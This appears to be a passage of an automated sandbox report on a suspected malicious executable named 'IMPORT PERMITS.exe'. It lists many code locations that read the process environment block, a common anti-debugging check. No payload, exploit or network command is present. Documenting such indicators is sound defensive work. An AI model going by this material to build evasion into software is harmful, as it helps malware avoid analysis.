                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DA197 mov eax, dword ptr fs:[00000030h]2_2_013DA197
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DA197 mov eax, dword ptr fs:[00000030h]2_2_013DA197
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DA197 mov eax, dword ptr fs:[00000030h]2_2_013DA197
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B61E5 mov eax, dword ptr fs:[00000030h]2_2_014B61E5
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014101F8 mov eax, dword ptr fs:[00000030h]2_2_014101F8
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149C188 mov eax, dword ptr fs:[00000030h]2_2_0149C188
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149C188 mov eax, dword ptr fs:[00000030h]2_2_0149C188
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01420185 mov eax, dword ptr fs:[00000030h]2_2_01420185
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01484180 mov eax, dword ptr fs:[00000030h]2_2_01484180
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01484180 mov eax, dword ptr fs:[00000030h]2_2_01484180
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146019F mov eax, dword ptr fs:[00000030h]2_2_0146019F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146019F mov eax, dword ptr fs:[00000030h]2_2_0146019F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146019F mov eax, dword ptr fs:[00000030h]2_2_0146019F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146019F mov eax, dword ptr fs:[00000030h]2_2_0146019F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466050 mov eax, dword ptr fs:[00000030h]2_2_01466050
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DA020 mov eax, dword ptr fs:[00000030h]2_2_013DA020
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DC020 mov eax, dword ptr fs:[00000030h]2_2_013DC020
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE016 mov eax, dword ptr fs:[00000030h]2_2_013FE016
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE016 mov eax, dword ptr fs:[00000030h]2_2_013FE016
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE016 mov eax, dword ptr fs:[00000030h]2_2_013FE016
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE016 mov eax, dword ptr fs:[00000030h]2_2_013FE016
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140C073 mov eax, dword ptr fs:[00000030h]2_2_0140C073
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01464000 mov ecx, dword ptr fs:[00000030h]2_2_01464000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01482000 mov eax, dword ptr fs:[00000030h]2_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01482000 mov eax, dword ptr fs:[00000030h]2_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01482000 mov eax, dword ptr fs:[00000030h]2_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01482000 mov eax, dword ptr fs:[00000030h]2_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01482000 mov eax, dword ptr fs:[00000030h]2_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01482000 mov eax, dword ptr fs:[00000030h]2_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01482000 mov eax, dword ptr fs:[00000030h]2_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01482000 mov eax, dword ptr fs:[00000030h]2_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E2050 mov eax, dword ptr fs:[00000030h]2_2_013E2050
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01476030 mov eax, dword ptr fs:[00000030h]2_2_01476030
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014620DE mov eax, dword ptr fs:[00000030h]2_2_014620DE
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D80A0 mov eax, dword ptr fs:[00000030h]2_2_013D80A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014660E0 mov eax, dword ptr fs:[00000030h]2_2_014660E0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014220F0 mov ecx, dword ptr fs:[00000030h]2_2_014220F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E208A mov eax, dword ptr fs:[00000030h]2_2_013E208A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DC0F0 mov eax, dword ptr fs:[00000030h]2_2_013DC0F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E80E9 mov eax, dword ptr fs:[00000030h]2_2_013E80E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DA0E3 mov ecx, dword ptr fs:[00000030h]2_2_013DA0E3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014780A8 mov eax, dword ptr fs:[00000030h]2_2_014780A8
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A60B8 mov eax, dword ptr fs:[00000030h]2_2_014A60B8
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A60B8 mov ecx, dword ptr fs:[00000030h]2_2_014A60B8
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B634F mov eax, dword ptr fs:[00000030h]2_2_014B634F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01462349 mov eax, dword ptr fs:[00000030h]2_2_01462349
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AA352 mov eax, dword ptr fs:[00000030h]2_2_014AA352
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01488350 mov ecx, dword ptr fs:[00000030h]2_2_01488350
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146035C mov eax, dword ptr fs:[00000030h]2_2_0146035C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146035C mov eax, dword ptr fs:[00000030h]2_2_0146035C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146035C mov eax, dword ptr fs:[00000030h]2_2_0146035C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146035C mov ecx, dword ptr fs:[00000030h]2_2_0146035C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146035C mov eax, dword ptr fs:[00000030h]2_2_0146035C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146035C mov eax, dword ptr fs:[00000030h]2_2_0146035C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DC310 mov ecx, dword ptr fs:[00000030h]2_2_013DC310
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148437C mov eax, dword ptr fs:[00000030h]2_2_0148437C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A30B mov eax, dword ptr fs:[00000030h]2_2_0141A30B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A30B mov eax, dword ptr fs:[00000030h]2_2_0141A30B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A30B mov eax, dword ptr fs:[00000030h]2_2_0141A30B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01400310 mov ecx, dword ptr fs:[00000030h]2_2_01400310
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B8324 mov eax, dword ptr fs:[00000030h]2_2_014B8324
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B8324 mov ecx, dword ptr fs:[00000030h]2_2_014B8324
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B8324 mov eax, dword ptr fs:[00000030h]2_2_014B8324
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B8324 mov eax, dword ptr fs:[00000030h]2_2_014B8324
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149C3CD mov eax, dword ptr fs:[00000030h]2_2_0149C3CD
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014663C0 mov eax, dword ptr fs:[00000030h]2_2_014663C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E3DB mov eax, dword ptr fs:[00000030h]2_2_0148E3DB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E3DB mov eax, dword ptr fs:[00000030h]2_2_0148E3DB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E3DB mov ecx, dword ptr fs:[00000030h]2_2_0148E3DB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E3DB mov eax, dword ptr fs:[00000030h]2_2_0148E3DB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014843D4 mov eax, dword ptr fs:[00000030h]2_2_014843D4
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014843D4 mov eax, dword ptr fs:[00000030h]2_2_014843D4
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8397 mov eax, dword ptr fs:[00000030h]2_2_013D8397
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8397 mov eax, dword ptr fs:[00000030h]2_2_013D8397
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8397 mov eax, dword ptr fs:[00000030h]2_2_013D8397
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE388 mov eax, dword ptr fs:[00000030h]2_2_013DE388
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE388 mov eax, dword ptr fs:[00000030h]2_2_013DE388
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE388 mov eax, dword ptr fs:[00000030h]2_2_013DE388
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014163FF mov eax, dword ptr fs:[00000030h]2_2_014163FF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE3F0 mov eax, dword ptr fs:[00000030h]2_2_013FE3F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE3F0 mov eax, dword ptr fs:[00000030h]2_2_013FE3F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE3F0 mov eax, dword ptr fs:[00000030h]2_2_013FE3F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140438F mov eax, dword ptr fs:[00000030h]2_2_0140438F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140438F mov eax, dword ptr fs:[00000030h]2_2_0140438F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E83C0 mov eax, dword ptr fs:[00000030h]2_2_013E83C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E83C0 mov eax, dword ptr fs:[00000030h]2_2_013E83C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E83C0 mov eax, dword ptr fs:[00000030h]2_2_013E83C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E83C0 mov eax, dword ptr fs:[00000030h]2_2_013E83C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01468243 mov eax, dword ptr fs:[00000030h]2_2_01468243
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01468243 mov ecx, dword ptr fs:[00000030h]2_2_01468243
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D823B mov eax, dword ptr fs:[00000030h]2_2_013D823B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B625D mov eax, dword ptr fs:[00000030h]2_2_014B625D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149A250 mov eax, dword ptr fs:[00000030h]2_2_0149A250
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149A250 mov eax, dword ptr fs:[00000030h]2_2_0149A250
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D826B mov eax, dword ptr fs:[00000030h]2_2_013D826B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4260 mov eax, dword ptr fs:[00000030h]2_2_013E4260
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4260 mov eax, dword ptr fs:[00000030h]2_2_013E4260
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4260 mov eax, dword ptr fs:[00000030h]2_2_013E4260
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6259 mov eax, dword ptr fs:[00000030h]2_2_013E6259
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DA250 mov eax, dword ptr fs:[00000030h]2_2_013DA250
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B62D6 mov eax, dword ptr fs:[00000030h]2_2_014B62D6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02A0 mov eax, dword ptr fs:[00000030h]2_2_013F02A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02A0 mov eax, dword ptr fs:[00000030h]2_2_013F02A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01460283 mov eax, dword ptr fs:[00000030h]2_2_01460283
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01460283 mov eax, dword ptr fs:[00000030h]2_2_01460283
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01460283 mov eax, dword ptr fs:[00000030h]2_2_01460283
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E284 mov eax, dword ptr fs:[00000030h]2_2_0141E284
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E284 mov eax, dword ptr fs:[00000030h]2_2_0141E284
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02E1 mov eax, dword ptr fs:[00000030h]2_2_013F02E1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02E1 mov eax, dword ptr fs:[00000030h]2_2_013F02E1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02E1 mov eax, dword ptr fs:[00000030h]2_2_013F02E1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov ecx, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141656A mov eax, dword ptr fs:[00000030h]2_2_0141656A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141656A mov eax, dword ptr fs:[00000030h]2_2_0141656A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141656A mov eax, dword ptr fs:[00000030h]2_2_0141656A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01476500 mov eax, dword ptr fs:[00000030h]2_2_01476500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8550 mov eax, dword ptr fs:[00000030h]2_2_013E8550
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8550 mov eax, dword ptr fs:[00000030h]2_2_013E8550
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E5CF mov eax, dword ptr fs:[00000030h]2_2_0141E5CF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E5CF mov eax, dword ptr fs:[00000030h]2_2_0141E5CF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A5D0 mov eax, dword ptr fs:[00000030h]2_2_0141A5D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A5D0 mov eax, dword ptr fs:[00000030h]2_2_0141A5D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C5ED mov eax, dword ptr fs:[00000030h]2_2_0141C5ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C5ED mov eax, dword ptr fs:[00000030h]2_2_0141C5ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E2582 mov eax, dword ptr fs:[00000030h]2_2_013E2582
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E2582 mov ecx, dword ptr fs:[00000030h]2_2_013E2582
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01414588 mov eax, dword ptr fs:[00000030h]2_2_01414588
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E59C mov eax, dword ptr fs:[00000030h]2_2_0141E59C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E25E0 mov eax, dword ptr fs:[00000030h]2_2_013E25E0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014605A7 mov eax, dword ptr fs:[00000030h]2_2_014605A7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014605A7 mov eax, dword ptr fs:[00000030h]2_2_014605A7
